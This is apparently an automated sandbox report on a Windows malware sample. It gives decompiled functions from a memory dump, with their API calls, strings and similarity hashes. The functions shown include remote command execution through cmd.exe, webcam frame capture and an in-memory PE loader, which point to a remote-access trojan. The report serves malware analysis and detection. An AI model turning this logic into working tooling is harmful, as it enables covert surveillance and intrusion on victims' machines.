Function 007526DB, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007526DB(void* __edx, void* __ebp, void* __eflags, char _a16, char _a60, void* _a92, char _a96, void* _a128, void* _a152) {
				void* _t11;

				_t41 = __eflags;
				_t11 = E0074427F(0,  &_a96, E00741F95(E00741E49( &_a16, __edx, __eflags, 0)));
				_t35 = L"/C ";
				ShellExecuteW(0, L"open", L"cmd.exe", E00741EEB(E00744405(0,  &_a60, L"/C ", _t41, _t11)), 0, 0);
				E00741EF0();
				E00741EF0();
				_t6 =  &_a16; // 0x744538
				E00741E74(_t6, _t35);
				E00741FC7();
				E00741FC7();
				return 0;
			}

0x007526db
0x007526f5
0x007526fb
0x0075271d
0x00752727
0x0075318d
0x007533c4
0x007533c8
0x007533d4
0x007533e0
0x007533ed

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0075271D

Strings

open, xrefs: 00752717
8Et, xrefs: 007533C4
cmd.exe, xrefs: 00752712
/C , xrefs: 007526FB

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $8Et$cmd.exe$open
API String ID: 587946157-2214960574
Opcode ID: b17d83831e7a0ce60b7bc4b348fbd7577aff0416c9f0a597434b26d61bd80737
Instruction ID: 3dd88c48109ab77643add7c9c1b0e846714fc3fab6c5ac8d430dbc4444f37b23
Opcode Fuzzy Hash: b17d83831e7a0ce60b7bc4b348fbd7577aff0416c9f0a597434b26d61bd80737
Instruction Fuzzy Hash: 23F04471108344DBD304FBB0DC9A9BFB3A9BF91341F80092EB94682092EF7C594DD611

Uniqueness

Uniqueness Score: -1.00%

Function 0074B82B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0074B82B(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v16;
				signed int _t34;
				signed int* _t49;
				signed int* _t57;
				void* _t65;
				signed int* _t66;

				_t65 = __ecx;
				E00770058(__ecx, 0);
				E0074D4A5(__ecx + 4);
				E0074D4A5(__ecx + 0xc);
				E0074D48F(__ecx + 0x14);
				E0074D48F(__ecx + 0x1c);
				E0074D4A5(__ecx + 0x24);
				E0074D4A5(__ecx + 0x2c);
				_t76 = _a4;
				if(_a4 == 0) {
					_t49 =  &_v16;
					E0074B7D0(_t49, "bad locale name");
					E0077205A( &_v16, 0x7a85e0);
					asm("int3");
					_push(_t65);
					_t66 = _t49;
					E007703EB(_t66);
					E0074D48A( &(_t66[0xb]));
					E0074D48A( &(_t66[9]));
					E0074D48A( &(_t66[7]));
					E0074D48A( &(_t66[5]));
					E0074D48A( &(_t66[3]));
					E0074D48A( &(_t66[1]));
					_t57 = _t66;
					_t34 =  *_t57;
					__eflags = _t34;
					if(_t34 == 0) {
						return E0077F125(4);
					} else {
						__eflags = _t34 - 8;
						if(_t34 < 8) {
							_t37 = 0x7ab050 + _t34 * 0x18;
							__eflags = 0x7ab050 + _t34 * 0x18;
							return E007708FD(0x7ab050 + _t34 * 0x18, _t37);
						}
						return _t34;
					}
				} else {
					E007703A0(__ebx, __edx, __edi, _t76, __ecx, _a4);
					return _t65;
				}
			}

0x0074b834
0x0074b836
0x0074b83e
0x0074b846
0x0074b84e
0x0074b856
0x0074b85e
0x0074b866
0x0074b86b
0x0074b86f
0x0074b88a
0x0074b88d
0x0074b89b
0x0074b8a0
0x0074b8a1
0x0074b8a2
0x0074b8a5
0x0074b8ae
0x0074b8b6
0x0074b8be
0x0074b8c6
0x0074b8ce
0x0074b8d6
0x0074b8db
0x007700b0
0x007700b2
0x007700b4
0x0077f14d
0x007700ba
0x007700ba
0x007700bd
0x007700c2
0x007700c2
0x00000000
0x007700cd
0x007700ce
0x007700ce
0x0074b871
0x0074b875
0x0074b882
0x0074b882

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0074B836
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0074B875

Part of subcall function 007703A0: _Yarn.LIBCPMT ref: 007703BF
Part of subcall function 007703A0: _Yarn.LIBCPMT ref: 007703E3

std::bad_exception::bad_exception.LIBCMT ref: 0074B88D
__CxxThrowException@8.LIBVCRUNTIME ref: 0074B89B

Strings

bad locale name, xrefs: 0074B885

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
String ID: bad locale name
API String ID: 3706160523-1405518554
Opcode ID: c9b93a330052fdb41e1b34a71dd3007a4c7a4ba61cf9edc06e26eb9725e332c3
Instruction ID: 77d435f4777c3bb46578f263c6026e954901b77921b235d09067f8ea01856af9
Opcode Fuzzy Hash: c9b93a330052fdb41e1b34a71dd3007a4c7a4ba61cf9edc06e26eb9725e332c3
Instruction Fuzzy Hash: 4EF08131500208EBC738FA24EC5FE9A73A8AF10390F50852DF98502492AF3CBD09C691

Uniqueness

Uniqueness Score: -1.00%

Function 0077CB8F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0077CB84,0000000C,?,0077CB24,0000000C,007A8188), ref: 0077CBAF
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0077CBC2
FreeLibrary.KERNEL32(00000000,?,?,?,0077CB84,0000000C,?,0077CB24,0000000C,007A8188), ref: 0077CBE5

Strings

CorExitProcess, xrefs: 0077CBBA
mscoree.dll, xrefs: 0077CBA8

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 76c4c5c7a81f964161e54b523bc3f7063c7212eb78fbda29f71ae933abcfd3fb
Instruction ID: 789a3bb2f17d8df6a1da5b9ca1f30348a227eb9e6a132df23103b0d263de0354
Opcode Fuzzy Hash: 76c4c5c7a81f964161e54b523bc3f7063c7212eb78fbda29f71ae933abcfd3fb
Instruction Fuzzy Hash: 60F06870650108BFCF169F54DC4ABAEBFB5EF08751F008169F809A22A0DB395E41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0077B2BA, Relevance: 7.7, APIs: 5, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0077B2BA(void* __ebx, void* __edx, void* __edi, void* __esi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				intOrPtr _v44;
				char _v48;
				signed int _t59;
				char* _t61;
				intOrPtr _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				void* _t106;
				intOrPtr _t108;
				intOrPtr _t109;
				int _t110;
				short* _t113;
				int _t114;
				int _t116;
				signed int _t117;

				_t106 = __edx;
				_t59 =  *0x7aa00c; // 0x67a7e35e
				_v8 = _t59 ^ _t117;
				_t61 = _a4;
				_t91 = _a12;
				_t116 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t113 = _a8;
				_v24 = _t113;
				if(_t61 == 0 || _t91 != 0) {
					if(_t113 != 0) {
						E00775507(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t116) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t116, _t113, 0xffffffff, _t116, _t116, _t116,  &_v20);
								if(_t64 == 0 || _v20 != _t116) {
									L55:
									_t65 = E0077A504();
									_t114 = _t113 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t114 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t113 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t114 = _t116;
								goto L56;
							}
							while(_t68 <= 0xff) {
								_t113 =  &(_t113[1]);
								_t116 = _t116 + 1;
								_t68 =  *_t113 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t108 = _v44;
						if( *((intOrPtr*)(_t108 + 0xa8)) != _t116) {
							if( *((intOrPtr*)(_t108 + 4)) != 1) {
								_t114 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, 0xffffffff, _t98, _t91, _t116,  &_v20);
								if(_t114 == 0) {
									if(_v20 != _t116 || GetLastError() != 0x7a) {
										L45:
										_t71 = E0077A504();
										_t116 = _t116 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t109 = _v44;
											_t103 =  *(_t109 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t109 + 8), _t116, _t73, 1,  &_v16, _t103, _t116,  &_v20);
											_t93 = _a12;
											_t110 = _t74;
											if(_t110 == 0 || _v20 != _t116 || _t110 < 0 || _t110 > 5) {
												goto L55;
											}
											if(_t110 + _t114 > _t93) {
												goto L56;
											}
											_t76 = _t116;
											_v32 = _t76;
											if(_t110 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t114 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t117 + _t76 - 0xc));
												 *((char*)(_t105 + _t114)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t114 = _t114 + 1;
												_v32 = _t76;
												if(_t76 < _t110) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t116) {
									goto L45;
								}
								_t28 = _t114 - 1; // -1
								_t116 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t116 = WideCharToMultiByte( *(_t108 + 8), _t116, _t113, _t91, _t98, _t91, _t116,  &_v20);
								if(_t116 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t116 - 1] == 0) {
										_t116 = _t116 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t113;
							_v24 = _t91;
							while( *_t83 != _t116) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t116 &&  *_t83 == _t116) {
								_t91 = (_t83 - _t113 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						while( *_t113 <= 0xff) {
							_t98[_t116] =  *_t113;
							_t85 =  *_t113;
							_t113 =  &(_t113[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t116 = _t116 + 1;
							if(_t116 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E0077A504())) = 0x16;
					E0077695D();
					goto L59;
				} else {
					L59:
					return E0076FD1B(_v8 ^ _t117);
				}
			}

0x0077b2ba
0x0077b2c2
0x0077b2c9
0x0077b2cc
0x0077b2d0
0x0077b2d4
0x0077b2d6
0x0077b2d9
0x0077b2dd
0x0077b2e0
0x0077b2e5
0x0077b2f4
0x0077b314
0x0077b319
0x0077b31e
0x0077b4bb
0x0077b4c4
0x0077b4f6
0x0077b4fe
0x0077b50a
0x0077b50a
0x0077b50f
0x0077b512
0x00000000
0x0077b505
0x0077b505
0x0077b505
0x0077b518
0x0077b51c
0x0077b521
0x0077b521
0x00000000
0x0077b528
0x0077b4fe
0x0077b4c6
0x0077b4cc
0x0077b4e4
0x0077b4e4
0x00000000
0x0077b4e4
0x0077b4d3
0x0077b4d8
0x0077b4db
0x0077b4dc
0x0077b4e2
0x00000000
0x00000000
0x00000000
0x0077b4e2
0x00000000
0x0077b4d3
0x0077b324
0x0077b32d
0x0077b367
0x0077b3e0
0x0077b3e4
0x0077b3fa
0x0077b4ab
0x0077b4ab
0x0077b4b0
0x0077b4b3
0x00000000
0x0077b40f
0x0077b411
0x00000000
0x00000000
0x0077b417
0x0077b41a
0x0077b41a
0x0077b41d
0x0077b423
0x0077b427
0x0077b427
0x0077b439
0x0077b43f
0x0077b442
0x0077b446
0x00000000
0x00000000
0x0077b46b
0x00000000
0x00000000
0x0077b471
0x0077b473
0x0077b478
0x0077b498
0x0077b49b
0x0077b49e
0x0077b4a3
0x00000000
0x00000000
0x00000000
0x0077b4a9
0x0077b47a
0x0077b47d
0x0077b47d
0x0077b481
0x0077b486
0x00000000
0x00000000
0x0077b48f
0x0077b490
0x0077b491
0x0077b496
0x00000000
0x00000000
0x00000000
0x0077b496
0x00000000
0x0077b47d
0x00000000
0x0077b41a
0x0077b3fa
0x0077b3e9
0x00000000
0x00000000
0x0077b3ef
0x0077b3ef
0x00000000
0x0077b3ef
0x0077b36b
0x0077b391
0x0077b3a4
0x0077b3a8
0x00000000
0x0077b3b8
0x0077b3c0
0x0077b3c6
0x0077b3c6
0x00000000
0x0077b3c0
0x0077b3a8
0x0077b36d
0x0077b36f
0x0077b372
0x0077b377
0x0077b37a
0x0077b37a
0x0077b37e
0x00000000
0x00000000
0x00000000
0x0077b37e
0x0077b383
0x0077b390
0x0077b390
0x00000000
0x0077b383
0x0077b331
0x00000000
0x00000000
0x0077b33c
0x0077b347
0x0077b34a
0x0077b34d
0x0077b353
0x00000000
0x00000000
0x0077b359
0x0077b35c
0x00000000
0x00000000
0x00000000
0x0077b35e
0x00000000
0x0077b33c
0x0077b2fb
0x0077b301
0x00000000
0x0077b2eb
0x0077b52a
0x0077b53a
0x0077b53a

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d53299585d93f83c0bdbf2d456244518b374d25149aa177b6fc15bb3f3de152e
Instruction ID: ff14c1edaf3f3f078de0cfb21c648d250e49bd698d38c93ac6307d2802c98bed
Opcode Fuzzy Hash: d53299585d93f83c0bdbf2d456244518b374d25149aa177b6fc15bb3f3de152e
Instruction Fuzzy Hash: C87190719002569BCF21CFA5C884BBFBB75FF553A0F24822AE419A7182D7789D81C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00744486, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 208
sleepCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00744486(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char** _a8, signed int _a12) {
				char _v8;
				void* _v40;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				char _v76;
				void* __esi;
				void* __ebp;
				void* _t26;
				char** _t28;
				intOrPtr* _t30;
				char* _t38;
				intOrPtr _t48;
				signed int _t57;
				signed int _t59;
				char* _t62;
				void* _t66;
				signed int _t67;
				void* _t69;
				signed int _t78;
				void* _t81;
				void* _t129;
				signed int _t131;
				signed int _t133;
				signed int _t134;
				signed int _t135;
				signed int _t136;
				signed int _t137;
				signed int _t141;
				void* _t144;
				void* _t145;
				intOrPtr* _t146;

				_push(__edi);
				_t125 = _a8;
				_t129 = __ecx;
				_t26 = E007427DA(__ecx, _a8);
				_t81 = _t129;
				_t152 = _t26;
				if(_t26 == 0) {
					_push(__ebx);
					E007428B9(_t81, __edx, 0);
					_t28 = E0074223F();
					_t78 = _a12;
					_a8 = _t28;
					_t120 =  *_t28;
					__eflags =  !_t120 - _t78;
					if( !_t120 <= _t78) {
						E007428D8(_t129);
						asm("int3");
						_push(_t129);
						_t30 = E00741F95( &_v8);
						E007442A6( &_v8,  &_v44, 4, 0xffffffff);
						_t144 = (_t141 & 0xfffffff8) - 0xc;
						E007420EC(_t78, _t144, _t120, __eflags, 0x7ac238);
						_t145 = _t144 - 0x18;
						E007420EC(_t78, _t145, _t120, __eflags,  &_v60);
						E00757478( &_v76, _t120);
						_t146 = _t145 + 0x30;
						_t131 =  *_t30 - 0x3c;
						__eflags = _t131;
						if(__eflags == 0) {
							E00741E49( &_v52, _t120, __eflags, 0);
							_t38 = E00742489();
							E00741F95(E00741E49( &_v56, _t120, __eflags, 0));
							_t120 = _t38;
							_t133 = E0074F69B();
							__eflags = _t133;
							if(_t133 != 0) {
								 *0x7abac4 = E0074F931(_t133, "OpenCamera");
								 *0x7abac0 = E0074F931(_t133, "CloseCamera");
								_t48 = E0074F931(_t133, "GetFrame");
								_t120 = "FreeFrame";
								 *0x7abac8 = _t48;
								 *0x7ababc = E0074F931(_t133, "FreeFrame");
								 *0x7abaaa = 1;
								E007420EC(_t78, _t146 - 0x18, "FreeFrame", __eflags, 0x7ac1b8);
								_push(0x1b);
								goto L23;
							}
						} else {
							_t134 = _t131 - 1;
							__eflags = _t134;
							if(_t134 == 0) {
								__eflags =  *0x7aba77;
								if(__eflags != 0) {
									goto L20;
								}
							} else {
								_t135 = _t134 - 1;
								__eflags = _t135;
								if(_t135 == 0) {
									 *0x7abac0();
									 *0x7aba77 = 0;
								} else {
									_t136 = _t135 - 1;
									__eflags = _t136;
									if(_t136 == 0) {
										_t57 =  *0x7abac4();
										 *0x7aba77 = _t57;
										__eflags = _t57;
										if(__eflags == 0) {
											goto L15;
										} else {
											L20:
											_t120 = E00776769(_t52, E00741F95(E00741E49( &_v52, _t120, __eflags, 0)));
											E0074471E(_a4, _t54, __eflags);
										}
									} else {
										_t137 = _t136 - 1;
										__eflags = _t137;
										if(_t137 == 0) {
											_t59 =  *0x7abac4();
											 *0x7aba77 = _t59;
											__eflags = _t59;
											if(__eflags == 0) {
												L15:
												E007420EC(_t78, _t146 - 0x18, _t120, __eflags, 0x7ac1b8);
												_push(0x41);
												L23:
												E00744AA4(_t78, _a4, _t120, __eflags);
											} else {
												_t62 = E00776769(_t60, E00741F95(E00741E49( &_v52, _t120, __eflags, _t137)));
												 *_t146 = 0x3e8;
												Sleep(??);
												_t120 = _t62;
												E0074471E(_a4, _t62, __eflags);
												 *0x7abac0();
											}
										}
									}
								}
							}
						}
						E00741E74( &_v52, _t120);
						E00741FC7();
						E00741FC7();
						__eflags = 0;
						return 0;
					} else {
						_t65 =  &(_t120[_t78]);
						_a12 =  &(_t120[_t78]);
						__eflags = _t78;
						if(__eflags != 0) {
							_push(0);
							_t67 = E00742815(_t78, _t129, _t120, _t125, __eflags, _t65);
							__eflags = _t67;
							if(_t67 != 0) {
								_push( *_a8);
								_t69 = E00742229(_t129);
								E0074159F(E00742229(_t129) + _t78 * 2, _t69);
								_push(_t78);
								E0074158B(E00742229(_t129), _t125);
								E00742888(_a12);
							}
						}
						_t66 = _t129;
						goto L7;
					}
				} else {
					_t66 = E007435BF(__ebx, _t129, __edx, _t125 - E00742229(_t81) >> 1, _t129, _t152, _t81, _t129, _t125 - E00742229(_t81) >> 1, _a12);
					L7:
					return _t66;
				}
			}

0x0074448a
0x0074448b
0x0074448e
0x00744491
0x00744496
0x00744498
0x0074449a
0x007444b4
0x007444b7
0x007444be
0x007444c3
0x007444c6
0x007444c9
0x007444cf
0x007444d1
0x00744532
0x00744537
0x00744544
0x00744545
0x00744558
0x0074455d
0x00744567
0x0074456c
0x00744576
0x0074457f
0x00744584
0x00744587
0x00744587
0x0074458a
0x0074466a
0x00744671
0x00744685
0x0074468a
0x00744693
0x00744695
0x00744697
0x007446aa
0x007446bb
0x007446c2
0x007446c7
0x007446cc
0x007446db
0x007446e2
0x007446ee
0x007446f3
0x00000000
0x007446f3
0x00744590
0x00744590
0x00744590
0x00744593
0x0074462f
0x00744636
0x00000000
0x00000000
0x00744599
0x00744599
0x00744599
0x0074459c
0x0074461d
0x00744623
0x0074459e
0x0074459e
0x0074459e
0x007445a1
0x0074460c
0x00744612
0x00744617
0x00744619
0x00000000
0x0074461b
0x0074463c
0x00744658
0x0074465a
0x0074465a
0x007445a3
0x007445a3
0x007445a3
0x007445a6
0x007445ac
0x007445b2
0x007445b7
0x007445b9
0x007445f6
0x00744600
0x00744605
0x007446f5
0x007446f8
0x007445bb
0x007445cd
0x007445d4
0x007445db
0x007445e4
0x007445e6
0x007445eb
0x007445eb
0x007445b9
0x007445a6
0x007445a1
0x0074459c
0x00744593
0x00744701
0x0074470a
0x00744712
0x00744717
0x0074471d
0x007444d3
0x007444d3
0x007444d6
0x007444d9
0x007444db
0x007444dd
0x007444e2
0x007444e7
0x007444e9
0x007444f0
0x007444f2
0x00744503
0x0074450d
0x00744515
0x00744522
0x00744522
0x007444e9
0x00744527
0x00000000
0x00744529
0x0074449c
0x007444ad
0x0074452a
0x0074452d
0x0074452d

APIs

Part of subcall function 007428D8: std::_Xinvalid_argument.LIBCPMT ref: 007428DD

Sleep.KERNEL32(00000000,?), ref: 007445DB

Part of subcall function 0074471E: __EH_prolog.LIBCMT ref: 00744723

Strings

OpenCamera, xrefs: 00744699
GetFrame, xrefs: 007446B6
FreeFrame, xrefs: 007446C7
CloseCamera, xrefs: 007446A5

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: H_prologSleepXinvalid_argumentstd::_
String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
API String ID: 834325642-3547787478
Opcode ID: 606f32eaa98e3a5c1dc9908f3191b592c85fc4fdc7f1be6db9d434f3358b59ea
Instruction ID: db0a2bcd5ef00e7daa2b9ad290bb7fdc8a0acbf94a5f938dd369c8d37803106e
Opcode Fuzzy Hash: 606f32eaa98e3a5c1dc9908f3191b592c85fc4fdc7f1be6db9d434f3358b59ea
Instruction Fuzzy Hash: 6B51D531B04214EBCB05FB74981EB6E3B99AF86700F408529F8059B7A3DF3C9D568796

Uniqueness

Uniqueness Score: -1.00%

Function 0074F6A7, Relevance: 7.7, APIs: 5, Instructions: 206
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0074F6A7(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v52;
				char _v56;
				signed int _t59;
				signed int _t61;
				void* _t64;
				void* _t67;
				signed int _t72;
				void* _t78;
				signed int _t79;
				void* _t80;
				signed int _t82;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				void* _t92;
				signed int _t93;
				intOrPtr* _t96;
				signed int _t98;
				signed int _t113;
				void* _t115;
				signed int _t118;
				void* _t124;
				signed int _t126;
				intOrPtr _t128;
				signed int _t129;
				void* _t130;
				signed int _t131;
				void* _t132;
				void* _t133;

				_t115 = 0x40;
				_v16 = __edx;
				_v8 = __ecx;
				_t124 = 0;
				if(E0074F14A(__edx, _t115) == 0) {
					L33:
					return 0;
				}
				if( *((intOrPtr*)(__ecx)) == 0x5a4d) {
					_t59 = E0074F14A(__edx,  *((intOrPtr*)(__ecx + 0x3c)) + 0xf8);
					__eflags = _t59;
					if(_t59 == 0) {
						goto L33;
					}
					_t96 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
					__eflags =  *_t96 - 0x4550;
					if( *_t96 != 0x4550) {
						goto L2;
					}
					__eflags =  *((intOrPtr*)(_t96 + 4)) - 0x14c;
					if( *((intOrPtr*)(_t96 + 4)) != 0x14c) {
						goto L2;
					}
					__eflags =  *(_t96 + 0x38) & 0x00000001;
					if(( *(_t96 + 0x38) & 0x00000001) != 0) {
						goto L2;
					}
					_t118 =  *(_t96 + 6) & 0x0000ffff;
					_t61 =  *(_t96 + 0x14) & 0x0000ffff;
					__eflags = _t118;
					if(_t118 == 0) {
						L14:
						__imp__GetNativeSystemInfo( &_v56);
						_t128 = E0074F139( *((intOrPtr*)(_t96 + 0x50)), _v52);
						_v20 = _t128;
						_t64 = E0074F139(_t124, _v52);
						__eflags = _t128 - _t64;
						if(_t128 != _t64) {
							goto L2;
						}
						_push(0);
						_t129 = E0074F643( *((intOrPtr*)(_t96 + 0x34)), _t128, 0x3000, 4);
						_t133 = _t132 + 0x14;
						_v12 = _t129;
						__eflags = _t129;
						if(_t129 != 0) {
							L18:
							_t67 = HeapAlloc(GetProcessHeap(), 8, 0x40);
							_t126 = _t67;
							__eflags = _t126;
							if(_t126 != 0) {
								 *(_t126 + 4) = _t129;
								 *(_t126 + 0x34) =  *(_t126 + 0x34) & 0x00000000;
								 *((intOrPtr*)(_t126 + 0x1c)) = E0074F643;
								 *(_t126 + 0x14) = ( *(_t96 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
								 *((intOrPtr*)(_t126 + 0x20)) = E0074F65A;
								 *((intOrPtr*)(_t126 + 0x24)) = E0074F66E;
								 *((intOrPtr*)(_t126 + 0x28)) = E0074F67C;
								 *((intOrPtr*)(_t126 + 0x2c)) = E0074F68D;
								 *((intOrPtr*)(_t126 + 0x3c)) = _v52;
								_t72 = E0074F14A(_v16,  *((intOrPtr*)(_t96 + 0x54)));
								__eflags = _t72;
								if(_t72 == 0) {
									L32:
									E0074FA47(_t126);
									goto L33;
								}
								_push(0);
								_t130 = E0074F643(_t129,  *((intOrPtr*)(_t96 + 0x54)), 0x1000, 4);
								E007724E0(_t130, _v8,  *((intOrPtr*)(_t96 + 0x54)));
								_t43 = _v8 + 0x3c; // 0x7930cc
								_t78 =  *_t43 + _t130;
								_t131 = _v12;
								 *_t126 = _t78;
								 *((intOrPtr*)(_t78 + 0x34)) = _t131;
								_t79 = E0074F15D(_v8, _v16, _t96, _t126);
								__eflags = _t79;
								if(_t79 == 0) {
									goto L32;
								}
								_t80 =  *_t126;
								_t123 =  *((intOrPtr*)(_t80 + 0x34)) ==  *((intOrPtr*)(_t96 + 0x34));
								__eflags =  *((intOrPtr*)(_t80 + 0x34)) ==  *((intOrPtr*)(_t96 + 0x34));
								if( *((intOrPtr*)(_t80 + 0x34)) ==  *((intOrPtr*)(_t96 + 0x34))) {
									_t98 = 1;
									__eflags = 1;
									 *((intOrPtr*)(_t126 + 0x18)) = 1;
								} else {
									 *((intOrPtr*)(_t126 + 0x18)) = E0074F459(_t126, _t123);
									_t98 = 1;
								}
								__eflags = E0074F4FE(_t126);
								if(__eflags != 0) {
									_t82 = E0074F304(_t126, __eflags);
									__eflags = _t82;
									if(_t82 == 0) {
										goto L32;
									}
									_t83 = E0074F428(_t126);
									__eflags = _t83;
									if(_t83 == 0) {
										goto L32;
									}
									_t85 =  *( *_t126 + 0x28);
									__eflags = _t85;
									if(_t85 == 0) {
										_t54 = _t126 + 0x38;
										 *_t54 =  *(_t126 + 0x38) & 0x00000000;
										__eflags =  *_t54;
										L38:
										return _t126;
									}
									_t87 = _t85 + _t131;
									__eflags =  *(_t126 + 0x14);
									if( *(_t126 + 0x14) == 0) {
										 *(_t126 + 0x38) = _t87;
										goto L38;
									}
									_t88 =  *_t87(_t131, _t98, 0);
									__eflags = _t88;
									if(_t88 != 0) {
										 *((intOrPtr*)(_t126 + 0x10)) = _t98;
										goto L38;
									}
									SetLastError(0x45a);
								}
								goto L32;
							}
							_push(_t67);
							E0074F65A(_t129, _t67, 0x8000);
							L17:
							_push(0xe);
							L3:
							SetLastError();
							goto L33;
						}
						_push(0);
						_t91 = E0074F643(0, _v20, 0x3000, 4);
						_t129 = _t91;
						_v12 = _t91;
						_t133 = _t133 + 0x14;
						__eflags = _t129;
						if(_t129 != 0) {
							goto L18;
						}
						goto L17;
					}
					_t113 = _t96 + 0x24 + _t61;
					__eflags = _t113;
					do {
						__eflags =  *(_t113 + 4);
						_t92 =  *_t113;
						if( *(_t113 + 4) != 0) {
							_t93 = _t92 +  *(_t113 + 4);
							__eflags = _t93;
						} else {
							_t93 = _t92 +  *(_t96 + 0x38);
						}
						__eflags = _t93 - _t124;
						_t124 =  >  ? _t93 : _t124;
						_t113 = _t113 + 0x28;
						_t118 = _t118 - 1;
						__eflags = _t118;
					} while (_t118 != 0);
					goto L14;
				}
				L2:
				_push(0xc1);
				goto L3;
			}

0x0074f6b6
0x0074f6b9
0x0074f6bc
0x0074f6bf
0x0074f6c8
0x0074f8e2
0x00000000
0x0074f8e2
0x0074f6d6
0x0074f6f3
0x0074f6f8
0x0074f6fa
0x00000000
0x00000000
0x0074f703
0x0074f705
0x0074f70b
0x00000000
0x00000000
0x0074f712
0x0074f716
0x00000000
0x00000000
0x0074f718
0x0074f71c
0x00000000
0x00000000
0x0074f71e
0x0074f722
0x0074f726
0x0074f728
0x0074f74c
0x0074f750
0x0074f761
0x0074f765
0x0074f768
0x0074f76d
0x0074f76f
0x00000000
0x00000000
0x0074f777
0x0074f788
0x0074f78a
0x0074f78d
0x0074f790
0x0074f792
0x0074f7b8
0x0074f7c3
0x0074f7c9
0x0074f7cb
0x0074f7cd
0x0074f7e4
0x0074f7eb
